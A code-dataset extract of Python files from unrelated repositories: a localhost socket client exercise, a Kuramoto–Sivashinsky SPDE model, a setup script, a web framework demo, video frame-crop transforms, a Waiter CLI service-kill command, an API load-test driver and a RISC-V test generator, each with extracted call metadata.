Alisa1114/yolov4-pytorch-1 | tools/client.py | 5dd8768f2eef868c9ee4588818350d4e1b50b98f | # -*- coding: UTF-8 -*-
from socket import *
def client():
#實驗室電腦
# serverip='120.126.151.182'
# serverport=8887
#在自己電腦測試
serverip='127.0.0.1'
serverport=8888
client=socket(AF_INET,SOCK_STREAM)
client.connect((serverip,serverport))
address_file = open('tools/address.txt', 'r')
address = address_file.read()
client.send(address.encode())
print(client.recv(1024).decode())
if __name__=='__main__':
client()
# buffer='POST /post HTTP/1.1\r\n'
# buffer+='Content-Type:application/json\r\n'
# buffer+='Body:{\\"StuId\\":\\"410785016 Chao,He-Teng\\"}\r\n'
# buffer+='Address : ' + address + '\r\n'
# buffer+='\r\n'
# print(buffer)
# message = "國立台北大學世界第一:)" | [] |
hassaniqbal209/data-assimilation | dapy/models/kuramoto_sivashinsky.py | ec52d655395dbed547edf4b4f3df29f017633f1b | """Non-linear SPDE model on a periodic 1D spatial domain for laminar wave fronts.
Based on the Kuramato--Sivashinsky PDE model [1, 2] which exhibits spatio-temporally
chaotic dynamics.
References:
1. Kuramoto and Tsuzuki. Persistent propagation of concentration waves
in dissipative media far from thermal equilibrium.
Progress in Theoretical Physcs, 55 (1976) pp. 356–369.
2. Sivashinsky. Nonlinear analysis of hydrodynamic instability in laminar
flames I. Derivation of basic equations.
Acta Astronomica, 4 (1977) pp. 1177–1206.
"""
from typing import Union, Optional, Sequence, Callable
import numpy as np
from dapy.models.base import AbstractDiagonalGaussianModel
from dapy.models.spatial import SpatiallyExtendedModelMixIn
from dapy.integrators.etdrk4 import FourierETDRK4Integrator
from dapy.models.transforms import (
OneDimensionalFourierTransformedDiagonalGaussianModelMixIn,
fft,
real_array_to_rfft_coeff,
rfft_coeff_to_real_array,
)
class FourierLaminarFlameModel(AbstractDiagonalGaussianModel):
"""Non-linear SPDE model on a periodic 1D spatial domain for laminar flame fronts.
This model class represents the state field by its the Fourier coefficients rather
than values of the state field at the spatial mesh points.
Based on the Kuramato--Sivashinsky PDE model [1, 2] which exhibits spatio-temporally
chaotic dynamics.
The governing stochastic partial differential equation (SPDE) is
dX = -(∂⁴X/∂s⁴ + ∂²X/∂s² + X * ∂X/∂s + γ * X) dt + κ ⊛ dW
where `s` is the spatial coordinate in a periodic domain `[0, S)`, `t` the time
coordinate, `X(s, t)` the state field process, `γ` a coefficient controlling the
degree of damping in the dynamics, `W(s, t)` a space-time white noise process,
`κ(s)` a spatial smoothing kernel and `⊛` indicates circular convolution in the
spatial coordinate.
Using a spectral spatial discretisation, this corresponds to a non-linear system of
stochastic differential equations (SDEs) in the Fourier coefficients X̃ₖ
dX̃ₖ = (ωₖ² - ωₖ⁴ - γ) * X̃ₖ + (i * ωₖ / 2) * DFTₖ(IDFT(X̃)²) + κ̃ₖ * dW̃ₖ
where `W̃ₖ` is a complex-valued Wiener process, `κ̃ₖ` the kth Fourier coefficient of
the smoothing kernel `κ`, `ωₖ = 2 * pi * k / S` the kth spatial frequency and `i`
the imaginary unit.
A Fourier-domain exponential time-differencing integrator with 4th order Runge--
Kutta updates for non-linear terms [3, 4] is used to integrate the deterministic
component of the SDE dynamics and an Euler-Maruyama discretisation used for the
Wiener process increment.
The smoothing kernel Fourier coefficients are assumed to be
κ̃ₖ = σ * exp(-ωₖ² * ℓ²) * √(M / S)
where `σ` is a parameter controlling the amplitude and `ℓ` a parameter controlling
the length scale.
References:
1. Kuramoto and Tsuzuki. Persistent propagation of concentration waves
in dissipative media far from thermal equilibrium.
Progress in Theoretical Physcs, 55 (1976) pp. 356–369.
2. Sivashinsky. Nonlinear analysis of hydrodynamic instability in laminar
flames I. Derivation of basic equations. Acta Astronomica, 4 (1977)
pp. 1177–1206.
3. Kassam, Aly-Khan and Trefethen, Lloyd N.
Fourth-order time-stepping for stiff PDEs.
SIAM Journal on Scientific Computing 26.4 (2005): 1214-1233.
4. Cox, Steven M. and Matthews, Paul C.
Exponential time differencing for stiff systems.
Journal of Computational Physics 176.2 (2002): 430-455.
"""
def __init__(
self,
dim_state: int = 512,
observation_space_indices: Union[slice, Sequence[int]] = slice(4, None, 8),
observation_function: Optional[Callable[[np.ndarray, int], np.ndarray]] = None,
time_step: float = 0.25,
domain_extent: float = 32 * np.pi,
damping_coeff: float = 1.0 / 6,
observation_noise_std: float = 0.5,
initial_state_amplitude: float = 1.0,
state_noise_amplitude: float = 1.0,
state_noise_length_scale: float = 1.0,
num_roots_of_unity_etdrk4_integrator: int = 16,
**kwargs
):
"""
Args:
dim_state: Dimension of state which is equivalent here to number of mesh
points in spatial discretization.
observation_space_indices: Slice or sequence of integers specifying spatial
mesh node indices (indices in to state vector) corresponding to
observation points.
observation_function: Function to apply to subsampled state field to compute
mean of observation(s) given state(s) at a given time index. Defaults to
identity function in first argument.
time_step: Integrator time step.
domain_extent: Extent (size) of spatial domain.
damping_coeff: Coefficient (`γ` in description above) controlling degree of
damping in dynamics.
observation_noise_std: Standard deviation of additive Gaussian noise in
observations. Either a scalar or array of shape `(dim_observation,)`.
Noise in each dimension assumed to be independent i.e. a diagonal noise
covariance.
initial_state_amplitude: Amplitude scale parameter for initial random
state field. Larger values correspond to larger magnitude values for the
initial state.
state_noise_amplitude: Amplitude scale parameter for additive state noise
in model dynamics. Larger values correspond to larger magnitude
additive noise in the state field.
state_noise_length_scale: Length scale parameter for smoothed noise used to
generate initial state and additive state noise fields. Larger values
correspond to smoother fields.
num_roots_of_unity_etdrk4_integrator: Number of roots of unity to use in
approximating contour integrals in exponential time-differencing plus
fourth-order Runge Kutta integrator.
"""
assert dim_state % 2 == 0, "State dimension `dim_state` must be even"
self.time_step = time_step
self.observation_space_indices = observation_space_indices
self.observation_function = observation_function
spatial_freqs = np.arange(dim_state // 2 + 1) * 2 * np.pi / domain_extent
spatial_freqs_sq = spatial_freqs ** 2
spatial_freqs[dim_state // 2] = 0
state_noise_kernel = (
(time_step) ** 0.5
* state_noise_amplitude
* np.exp(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)
* (dim_state / domain_extent) ** 0.5
)
state_noise_std = rfft_coeff_to_real_array(
state_noise_kernel + 1j * state_noise_kernel, False
)
initial_state_kernel = (
initial_state_amplitude
* np.exp(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)
* (dim_state / domain_extent) ** 0.5
)
initial_state_std = rfft_coeff_to_real_array(
initial_state_kernel + 1j * initial_state_kernel, False
)
def linear_operator(freqs, freqs_sq):
return freqs_sq - freqs_sq ** 2 - damping_coeff
def nonlinear_operator(v, freqs, freqs_sq):
return (
-0.5j * freqs * fft.rfft(fft.irfft(v, norm="ortho") ** 2, norm="ortho")
)
self.integrator = FourierETDRK4Integrator(
linear_operator=linear_operator,
nonlinear_operator=nonlinear_operator,
num_mesh_point=dim_state,
domain_size=domain_extent,
time_step=time_step,
num_roots_of_unity=num_roots_of_unity_etdrk4_integrator,
)
if observation_function is None:
dim_observation = np.zeros(dim_state)[observation_space_indices].shape[0]
else:
dim_observation = observation_function(
np.zeros(dim_state)[observation_space_indices], 0
).shape[0]
super().__init__(
dim_state=dim_state,
dim_observation=dim_observation,
initial_state_std=initial_state_std,
initial_state_mean=np.zeros(dim_state),
state_noise_std=state_noise_std,
observation_noise_std=observation_noise_std,
**kwargs
)
def _next_state_mean(self, states: np.ndarray, t: int) -> np.ndarray:
return rfft_coeff_to_real_array(
self.integrator.step(real_array_to_rfft_coeff(states))
)
def _observation_mean(self, states: np.ndarray, t: int) -> np.ndarray:
subsampled_states = fft.irfft(real_array_to_rfft_coeff(states), norm="ortho")[
..., self.observation_space_indices
]
if self.observation_function is None:
return subsampled_states
else:
return self.observation_function(subsampled_states, t)
class SpatialLaminarFlameModel(
SpatiallyExtendedModelMixIn,
OneDimensionalFourierTransformedDiagonalGaussianModelMixIn,
FourierLaminarFlameModel,
):
"""Non-linear SPDE model on a periodic 1D spatial domain for laminar flame fronts.
This model class represents the state field by its values at the spatial mesh points
rather than the corresponding Fourier coefficients. For more details see the
docstring of `FourierLaminarFlameModel`.
"""
def __init__(
self,
dim_state: int = 512,
observation_space_indices: Union[slice, Sequence[int]] = slice(4, None, 8),
observation_function: Optional[Callable[[np.ndarray, int], np.ndarray]] = None,
time_step: float = 0.25,
domain_extent: float = 32 * np.pi,
damping_coeff: float = 1.0 / 6,
observation_noise_std: float = 0.5,
initial_state_amplitude: float = 1.0,
state_noise_amplitude: float = 1.0,
state_noise_length_scale: float = 1.0,
num_roots_of_unity_etdrk4_integrator: int = 16,
):
"""
Args:
dim_state: Dimension of state which is equivalent here to number of mesh
points in spatial discretization.
observation_space_indices: Slice or sequence of integers specifying spatial
mesh node indices (indices in to state vector) corresponding to
observation points.
observation_function: Function to apply to subsampled state field to compute
mean of observation(s) given state(s) at a given time index. Defaults to
identity function in first argument.
time_step: Integrator time step.
domain_extent: Extent (size) of spatial domain.
damping_coeff: Coefficient (`γ` in description above) controlling degree of
damping in dynamics.
observation_noise_std: Standard deviation of additive Gaussian noise in
observations. Either a scalar or array of shape `(dim_observation,)`.
Noise in each dimension assumed to be independent i.e. a diagonal noise
covariance.
initial_state_amplitude: Amplitude scale parameter for initial random
state field. Larger values correspond to larger magnitude values for the
initial state.
state_noise_amplitude: Amplitude scale parameter for additive state noise
in model dynamics. Larger values correspond to larger magnitude
additive noise in the state field.
state_noise_length_scale: Length scale parameter for smoothed noise used to
generate initial state and additive state noise fields. Larger values
correspond to smoother fields.
num_roots_of_unity_etdrk4_integrator: Number of roots of unity to use in
approximating contour integrals in exponential time-differencing plus
fourth-order Runge Kutta integrator.
"""
super().__init__(
dim_state=dim_state,
observation_space_indices=observation_space_indices,
observation_function=observation_function,
time_step=time_step,
domain_extent=domain_extent,
damping_coeff=damping_coeff,
observation_noise_std=observation_noise_std,
initial_state_amplitude=initial_state_amplitude,
state_noise_amplitude=state_noise_amplitude,
state_noise_length_scale=state_noise_length_scale,
num_roots_of_unity_etdrk4_integrator=num_roots_of_unity_etdrk4_integrator,
mesh_shape=(dim_state,),
domain_extents=(domain_extent,),
domain_is_periodic=True,
observation_node_indices=observation_space_indices,
)
| [((144, 26, 146, 9), 'dapy.models.transforms.rfft_coeff_to_real_array', 'rfft_coeff_to_real_array', ({(145, 12, 145, 56): 'state_noise_kernel + 1.0j * state_noise_kernel', (145, 58, 145, 63): 'False'}, {}), '(state_noise_kernel + 1.0j * state_noise_kernel, False)', False, 'from dapy.models.transforms import OneDimensionalFourierTransformedDiagonalGaussianModelMixIn, fft, real_array_to_rfft_coeff, rfft_coeff_to_real_array\n'), ((152, 28, 154, 9), 'dapy.models.transforms.rfft_coeff_to_real_array', 'rfft_coeff_to_real_array', ({(153, 12, 153, 60): 'initial_state_kernel + 1.0j * initial_state_kernel', (153, 62, 153, 67): 'False'}, {}), '(initial_state_kernel + 1.0j * initial_state_kernel,\n False)', False, 'from dapy.models.transforms import OneDimensionalFourierTransformedDiagonalGaussianModelMixIn, fft, real_array_to_rfft_coeff, rfft_coeff_to_real_array\n'), ((164, 26, 171, 9), 'dapy.integrators.etdrk4.FourierETDRK4Integrator', 'FourierETDRK4Integrator', (), '', False, 'from dapy.integrators.etdrk4 import FourierETDRK4Integrator\n'), ((141, 14, 141, 77), 'numpy.exp', 'np.exp', ({(141, 21, 141, 76): '(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)'}, {}), '(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)', True, 'import numpy as np\n'), ((149, 14, 149, 77), 'numpy.exp', 'np.exp', ({(149, 21, 149, 76): '(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)'}, {}), '(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)', True, 'import numpy as np\n'), ((182, 31, 182, 50), 'numpy.zeros', 'np.zeros', ({(182, 40, 182, 49): 'dim_state'}, {}), '(dim_state)', True, 'import numpy as np\n'), ((190, 33, 190, 65), 'dapy.models.transforms.real_array_to_rfft_coeff', 'real_array_to_rfft_coeff', ({(190, 58, 190, 64): 'states'}, {}), '(states)', False, 'from dapy.models.transforms import OneDimensionalFourierTransformedDiagonalGaussianModelMixIn, fft, real_array_to_rfft_coeff, rfft_coeff_to_real_array\n'), ((194, 38, 194, 70), 'dapy.models.transforms.real_array_to_rfft_coeff', 'real_array_to_rfft_coeff', ({(194, 63, 194, 69): 'states'}, {}), '(states)', False, 'from dapy.models.transforms import OneDimensionalFourierTransformedDiagonalGaussianModelMixIn, fft, real_array_to_rfft_coeff, rfft_coeff_to_real_array\n'), ((135, 24, 135, 53), 'numpy.arange', 'np.arange', ({(135, 34, 135, 52): '(dim_state // 2 + 1)'}, {}), '(dim_state // 2 + 1)', True, 'import numpy as np\n'), ((161, 41, 161, 67), 'dapy.models.transforms.fft.irfft', 'fft.irfft', (), '', False, 'from dapy.models.transforms import OneDimensionalFourierTransformedDiagonalGaussianModelMixIn, fft, real_array_to_rfft_coeff, rfft_coeff_to_real_array\n'), ((173, 30, 173, 49), 'numpy.zeros', 'np.zeros', ({(173, 39, 173, 48): 'dim_state'}, {}), '(dim_state)', True, 'import numpy as np\n'), ((176, 16, 176, 35), 'numpy.zeros', 'np.zeros', ({(176, 25, 176, 34): 'dim_state'}, {}), '(dim_state)', True, 'import numpy as np\n')] |
Lif3line/myo-helper | setup.py | 7c71a3ee693661ddba0171545bf5798f46231b3c | """Utiltiy functions for working with Myo Armband data."""
from setuptools import setup, find_packages
setup(name='myo_helper',
version='0.1',
description='Utiltiy functions for working with Myo Armband data',
author='Lif3line',
author_email='[email protected]',
license='MIT',
packages=find_packages(),
url='https://github.com/Lif3line/myo_helper', # use the URL to the github repo
install_requires=[
'scipy',
'sklearn',
'numpy'
],
keywords='myo emg')
| [((12, 15, 12, 30), 'setuptools.find_packages', 'find_packages', ({}, {}), '()', False, 'from setuptools import setup, find_packages\n')] |
karldoenitz/karlooper | demos/restful-users/index.py | 2e1df83ed1ec9b343cdd930162a4de7ecd149c04 | # -*-encoding:utf-8-*-
import os
from karlooper.web.application import Application
from karlooper.web.request import Request
class UsersHandler(Request):
def get(self):
return self.render("/user-page.html")
class UserInfoHandler(Request):
def post(self):
print(self.get_http_request_message())
size = self.get_parameter("user_size", 0)
size = int(size)
user_list = [{"name": "name_%d" % i, "gender": "male", "age": i + 10} for i in range(size)]
result = {
"status": 0,
"message": "OK",
"data": user_list
}
return self.response_as_json(result)
url_mapping = {
"/users": UsersHandler,
"/user-info": UserInfoHandler
}
settings = {
"template": os.getcwd() + "/templates",
"static": os.getcwd() + "/templates",
"log_enable": False,
"debug": True
}
if __name__ == '__main__':
application = Application(url_mapping, settings=settings)
application.listen(port=8080)
application.run()
| [((41, 18, 41, 61), 'karlooper.web.application.Application', 'Application', (), '', False, 'from karlooper.web.application import Application\n'), ((33, 16, 33, 27), 'os.getcwd', 'os.getcwd', ({}, {}), '()', False, 'import os\n'), ((34, 14, 34, 25), 'os.getcwd', 'os.getcwd', ({}, {}), '()', False, 'import os\n')] |
LijiangLong/3D-ResNets-PyTorch | temporal_transforms.py | 89d2cba0b52d55aaa834635a81c172bc38771cd3 | import random
import math
class LoopPadding(object):
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
out = frame_indices
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out
class TemporalBeginCrop(object):
"""Temporally crop the given frame indices at a beginning.
If the number of frames is less than the size,
loop the indices as many times as necessary to satisfy the size.
Args:
size (int): Desired output size of the crop.
"""
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
out = frame_indices[:self.size]
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out
class TemporalCenterCrop(object):
"""Temporally crop the given frame indices at a center.
If the number of frames is less than the size,
loop the indices as many times as necessary to satisfy the size.
Args:
size (int): Desired output size of the crop.
"""
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
"""
Args:
frame_indices (list): frame indices to be cropped.
Returns:
list: Cropped frame indices.
"""
center_index = len(frame_indices) // 2
begin_index = max(0, center_index - (self.size // 2))
end_index = min(begin_index + self.size, len(frame_indices))
out = frame_indices[begin_index:end_index]
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out
class TemporalRandomCrop(object):
"""Temporally crop the given frame indices at a random location.
If the number of frames is less than the size,
loop the indices as many times as necessary to satisfy the size.
Args:
size (int): Desired output size of the crop.
"""
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
"""
Args:
frame_indices (list): frame indices to be cropped.
Returns:
list: Cropped frame indices.
"""
rand_end = max(0, len(frame_indices) - self.size - 1)
begin_index = random.randint(0, rand_end)
end_index = min(begin_index + self.size, len(frame_indices))
out = frame_indices[begin_index:end_index]
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out
class TemporalCenterCropFlexible(object):
def __init__(self, begin=15, step=3, end=108):
self.begin = begin
self.step = step
self.end = end
assert (end - begin) / step + 1 == 32
def __call__(self, frame_indices):
out = frame_indices[slice(self.begin, self.end+1, self.step)]
return out
class TemporalCenterRandomCrop(object):
"""Temporally crop the given frame indices at a random location.
If the number of frames is less than the size,
loop the indices as many times as necessary to satisfy the size.
Args:
size (int): Desired output size of the crop.
"""
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
"""
Args:
frame_indices (list): frame indices to be cropped.
Returns:
list: Cropped frame indices.
"""
spacing = int((len(frame_indices) - self.size)/2) # i.e. if 120 and 90: = 30
offset = random.randint(-1*int(spacing/2) + 1, int(spacing/2) - 1) # i.e if 120 and 90, -14 to 14
begin_index = int(len(frame_indices)/2) - int(self.size/2) + offset # i.e. 120: 60 - 45 + offset (-1 to 29)
end_index = begin_index + self.size
out = frame_indices[begin_index:end_index]
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out | [((102, 22, 102, 49), 'random.randint', 'random.randint', ({(102, 37, 102, 38): '0', (102, 40, 102, 48): 'rand_end'}, {}), '(0, rand_end)', False, 'import random\n')] |
geofft/waiter | cli/waiter/subcommands/kill.py | 0e10cd497c2c679ea43231866d9f803c3fed5d77 | from waiter.action import process_kill_request
from waiter.util import guard_no_cluster, check_positive
def kill(clusters, args, _, __):
"""Kills the service(s) using the given token name."""
guard_no_cluster(clusters)
token_name_or_service_id = args.get('token-or-service-id')
is_service_id = args.get('is-service-id', False)
force_flag = args.get('force', False)
timeout_secs = args['timeout']
success = process_kill_request(clusters, token_name_or_service_id, is_service_id, force_flag, timeout_secs)
return 0 if success else 1
def register(add_parser):
"""Adds this sub-command's parser and returns the action function"""
parser = add_parser('kill', help='kill services')
parser.add_argument('token-or-service-id')
parser.add_argument('--force', '-f', help='kill all services, never prompt', dest='force', action='store_true')
parser.add_argument('--service-id', '-s', help='kill by service id instead of token',
dest='is-service-id', action='store_true')
parser.add_argument('--timeout', '-t', help='timeout (in seconds) for kill to complete',
type=check_positive, default=30)
return kill
| [((7, 4, 7, 30), 'waiter.util.guard_no_cluster', 'guard_no_cluster', ({(7, 21, 7, 29): 'clusters'}, {}), '(clusters)', False, 'from waiter.util import guard_no_cluster, check_positive\n'), ((12, 14, 12, 111), 'waiter.action.process_kill_request', 'process_kill_request', ({(12, 35, 12, 43): 'clusters', (12, 45, 12, 69): 'token_name_or_service_id', (12, 71, 12, 84): 'is_service_id', (12, 86, 12, 96): 'force_flag', (12, 98, 12, 110): 'timeout_secs'}, {}), '(clusters, token_name_or_service_id, is_service_id,\n force_flag, timeout_secs)', False, 'from waiter.action import process_kill_request\n')] |
syeda-khurrath/fabric8-analytics-common | a2t/src/a2t.py | 421f7e27869c5695ed73b51e6422e097aba00108 | """The main module of the Analytics API Load Tests tool.
Copyright (c) 2019 Red Hat Inc.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import sys
import os
from time import time
from fastlog import log
from csv_reader import read_csv_as_dicts
from setup import setup
from cliargs import cli_parser
from component_analysis import ComponentAnalysis
from stack_analysis import StackAnalysis
from test_runner import start_tests
# current version of this tool
VERSION_MAJOR = 1
VERSION_MINOR = 0
def check_api_endpoint(api):
"""Check that some API endpoint is callable."""
log.info("Checking: core API endpoint")
with log.indent():
if not api.is_api_running():
log.error("Fatal: tested system is not available")
sys.exit(1)
else:
log.success("ok")
def check_auth_token(api):
"""Check the authorization token for the core API."""
log.info("Checking: authorization token for the core API")
with log.indent():
if api.check_auth_token_validity():
log.success("ok")
else:
log.error("Fatal: wrong token(?)")
sys.exit(1)
def check_system(api):
"""Check if all system endpoints are available and that tokens are valid."""
# try to access system endpoints
log.info("System check")
with log.indent():
check_api_endpoint(api)
check_auth_token(api)
def show_version():
"""Show A2T version."""
print("A2T version {major}.{minor}".format(major=VERSION_MAJOR, minor=VERSION_MINOR))
def main():
"""Entry point to the Analytics API Load Tests."""
log.setLevel(log.INFO)
cli_arguments = cli_parser.parse_args()
if cli_arguments.version:
show_version()
sys.exit(0)
else:
cfg = setup(cli_arguments)
coreapi_url = os.environ.get('F8A_SERVER_API_URL', None)
component_analysis = ComponentAnalysis(coreapi_url,
cfg["access_token"], cfg["user_key"], True)
stack_analysis = StackAnalysis(coreapi_url,
cfg["access_token"], cfg["user_key"], True)
check_system(component_analysis)
try:
tests = read_csv_as_dicts(cfg["input_file"])
except Exception as e:
log.error("Test description can not be read")
log.error(e)
sys.exit(0)
t1 = time()
tags = cfg["tags"]
start_tests(cfg, tests, tags, component_analysis, stack_analysis)
t2 = time()
log.info("Start time: {}".format(t1))
log.info("End time: {}".format(t2))
log.info("Duration: {}".format(t2 - t1))
if __name__ == "__main__":
# execute only if run as a script
main()
| [((39, 4, 39, 43), 'fastlog.log.info', 'log.info', ({(39, 13, 39, 42): '"""Checking: core API endpoint"""'}, {}), "('Checking: core API endpoint')", False, 'from fastlog import log\n'), ((50, 4, 50, 62), 'fastlog.log.info', 'log.info', ({(50, 13, 50, 61): '"""Checking: authorization token for the core API"""'}, {}), "('Checking: authorization token for the core API')", False, 'from fastlog import log\n'), ((62, 4, 62, 28), 'fastlog.log.info', 'log.info', ({(62, 13, 62, 27): '"""System check"""'}, {}), "('System check')", False, 'from fastlog import log\n'), ((75, 4, 75, 26), 'fastlog.log.setLevel', 'log.setLevel', ({(75, 17, 75, 25): 'log.INFO'}, {}), '(log.INFO)', False, 'from fastlog import log\n'), ((76, 20, 76, 43), 'cliargs.cli_parser.parse_args', 'cli_parser.parse_args', ({}, {}), '()', False, 'from cliargs import cli_parser\n'), ((40, 9, 40, 21), 'fastlog.log.indent', 'log.indent', ({}, {}), '()', False, 'from fastlog import log\n'), ((51, 9, 51, 21), 'fastlog.log.indent', 'log.indent', ({}, {}), '()', False, 'from fastlog import log\n'), ((63, 9, 63, 21), 'fastlog.log.indent', 'log.indent', ({}, {}), '()', False, 'from fastlog import log\n'), ((79, 8, 79, 19), 'sys.exit', 'sys.exit', ({(79, 17, 79, 18): '(0)'}, {}), '(0)', False, 'import sys\n'), ((81, 14, 81, 34), 'setup.setup', 'setup', ({(81, 20, 81, 33): 'cli_arguments'}, {}), '(cli_arguments)', False, 'from setup import setup\n'), ((83, 22, 83, 64), 'os.environ.get', 'os.environ.get', ({(83, 37, 83, 57): '"""F8A_SERVER_API_URL"""', (83, 59, 83, 63): 'None'}, {}), "('F8A_SERVER_API_URL', None)", False, 'import os\n'), ((84, 29, 85, 90), 'component_analysis.ComponentAnalysis', 'ComponentAnalysis', ({(84, 47, 84, 58): 'coreapi_url', (85, 47, 85, 66): "cfg['access_token']", (85, 68, 85, 83): "cfg['user_key']", (85, 85, 85, 89): 'True'}, {}), "(coreapi_url, cfg['access_token'], cfg['user_key'], True)", False, 'from component_analysis import ComponentAnalysis\n'), ((86, 25, 87, 82), 'stack_analysis.StackAnalysis', 'StackAnalysis', ({(86, 39, 86, 50): 'coreapi_url', (87, 39, 87, 58): "cfg['access_token']", (87, 60, 87, 75): "cfg['user_key']", (87, 77, 87, 81): 'True'}, {}), "(coreapi_url, cfg['access_token'], cfg['user_key'], True)", False, 'from stack_analysis import StackAnalysis\n'), ((98, 13, 98, 19), 'time.time', 'time', ({}, {}), '()', False, 'from time import time\n'), ((100, 8, 100, 73), 'test_runner.start_tests', 'start_tests', ({(100, 20, 100, 23): 'cfg', (100, 25, 100, 30): 'tests', (100, 32, 100, 36): 'tags', (100, 38, 100, 56): 'component_analysis', (100, 58, 100, 72): 'stack_analysis'}, {}), '(cfg, tests, tags, component_analysis, stack_analysis)', False, 'from test_runner import start_tests\n'), ((101, 13, 101, 19), 'time.time', 'time', ({}, {}), '()', False, 'from time import time\n'), ((42, 12, 42, 62), 'fastlog.log.error', 'log.error', ({(42, 22, 42, 61): '"""Fatal: tested system is not available"""'}, {}), "('Fatal: tested system is not available')", False, 'from fastlog import log\n'), ((43, 12, 43, 23), 'sys.exit', 'sys.exit', ({(43, 21, 43, 22): '(1)'}, {}), '(1)', False, 'import sys\n'), ((45, 12, 45, 29), 'fastlog.log.success', 'log.success', ({(45, 24, 45, 28): '"""ok"""'}, {}), "('ok')", False, 'from fastlog import log\n'), ((53, 12, 53, 29), 'fastlog.log.success', 'log.success', ({(53, 24, 53, 28): '"""ok"""'}, {}), "('ok')", False, 'from fastlog import log\n'), ((55, 12, 55, 46), 'fastlog.log.error', 'log.error', ({(55, 22, 55, 45): '"""Fatal: wrong token(?)"""'}, {}), "('Fatal: wrong token(?)')", False, 'from fastlog import log\n'), ((56, 12, 56, 23), 'sys.exit', 'sys.exit', ({(56, 21, 56, 22): '(1)'}, {}), '(1)', False, 'import sys\n'), ((92, 20, 92, 56), 'csv_reader.read_csv_as_dicts', 'read_csv_as_dicts', ({(92, 38, 92, 55): "cfg['input_file']"}, {}), "(cfg['input_file'])", False, 'from csv_reader import read_csv_as_dicts\n'), ((94, 12, 94, 57), 'fastlog.log.error', 'log.error', ({(94, 22, 94, 56): '"""Test description can not be read"""'}, {}), "('Test description can not be read')", False, 'from fastlog import log\n'), ((95, 12, 95, 24), 'fastlog.log.error', 'log.error', ({(95, 22, 95, 23): 'e'}, {}), '(e)', False, 'from fastlog import log\n'), ((96, 12, 96, 23), 'sys.exit', 'sys.exit', ({(96, 21, 96, 22): '(0)'}, {}), '(0)', False, 'import sys\n')] |
Giri2801/riscv-ctg | riscv_ctg/ctg.py | a90e03f0856bbdd106c3f6d51815af94707e711e | # See LICENSE.incore file for details
import os,re
import multiprocessing as mp
import time
import shutil
from riscv_ctg.log import logger
import riscv_ctg.utils as utils
import riscv_ctg.constants as const
from riscv_isac.cgf_normalize import expand_cgf
from riscv_ctg.generator import Generator
from math import *
from riscv_ctg.__init__ import __version__
def create_test(usage_str, node,label,base_isa,max_inst):
global op_template
global ramdomize
global out_dir
global xlen
flen = 0
if 'opcode' not in node:
return
if 'ignore' in node:
logger.info("Ignoring :" + str(label))
if node['ignore']:
return
for opcode in node['opcode']:
op_node=None
if opcode not in op_template:
for op,foo in op_template.items():
if op!='metadata' and foo['std_op'] is not None and opcode==foo['std_op']:
op_node = foo
break
else:
op_node = op_template[opcode]
if op_node is None:
logger.warning("Skipping :" + str(opcode))
return
if xlen not in op_node['xlen']:
logger.warning("Skipping {0} since its not supported in current XLEN:".format(opcode))
return
if 'flen' in op_node:
if '.d' in opcode:
flen = 64
elif '.s' in opcode:
flen = 32
else:
flen = op_node['flen'][0]
#if flen not in op_node['flen']:
# return
fprefix = os.path.join(out_dir,str(label))
logger.info('Generating Test for :' + str(label) +"-" + opcode)
formattype = op_node['formattype']
gen = Generator(formattype,op_node,opcode,randomize,xlen,flen,base_isa)
op_comb = gen.opcomb(node)
val_comb = gen.valcomb(node)
instr_dict = gen.correct_val(gen.testreg(gen.swreg(gen.gen_inst(op_comb, val_comb, node))))
logger.info("Writing tests for :"+str(label))
my_dict = gen.reformat_instr(instr_dict)
gen.write_test(fprefix,node,label,my_dict, op_node, usage_str, max_inst)
def ctg(verbose, out, random ,xlen_arg, cgf_file,num_procs,base_isa, max_inst,list_duplicate):
global op_template
global randomize
global out_dir
global xlen
logger.level(verbose)
logger.info('****** RISC-V Compliance Test Generator {0} *******'.format(__version__ ))
logger.info('Copyright (c) 2020, InCore Semiconductors Pvt. Ltd.')
logger.info('All Rights Reserved.')
logger.info("Copying env folder to Output directory.")
env_dir = os.path.join(out,"env")
if not os.path.exists(env_dir):
shutil.copytree(const.env,env_dir)
xlen = int(xlen_arg)
out_dir = out
randomize = random
mytime = time.asctime(time.gmtime(time.time()) ) + ' GMT'
cgf_argument = ''
for cf in cgf_file:
cgf_argument += '// --cgf {} \\\n'.format(cf)
randomize_argument = ''
if random is True:
randomize_argument = ' \\\n// --randomize'
usage_str = const.usage.safe_substitute(base_isa=base_isa, \
cgf=cgf_argument, version = __version__, time=mytime, \
randomize=randomize_argument,xlen=str(xlen_arg))
op_template = utils.load_yaml(const.template_file)
cgf = expand_cgf(cgf_file,xlen,list_duplicate)
pool = mp.Pool(num_procs)
results = pool.starmap(create_test, [(usage_str, node,label,base_isa,max_inst) for label,node in cgf.items()])
pool.close()
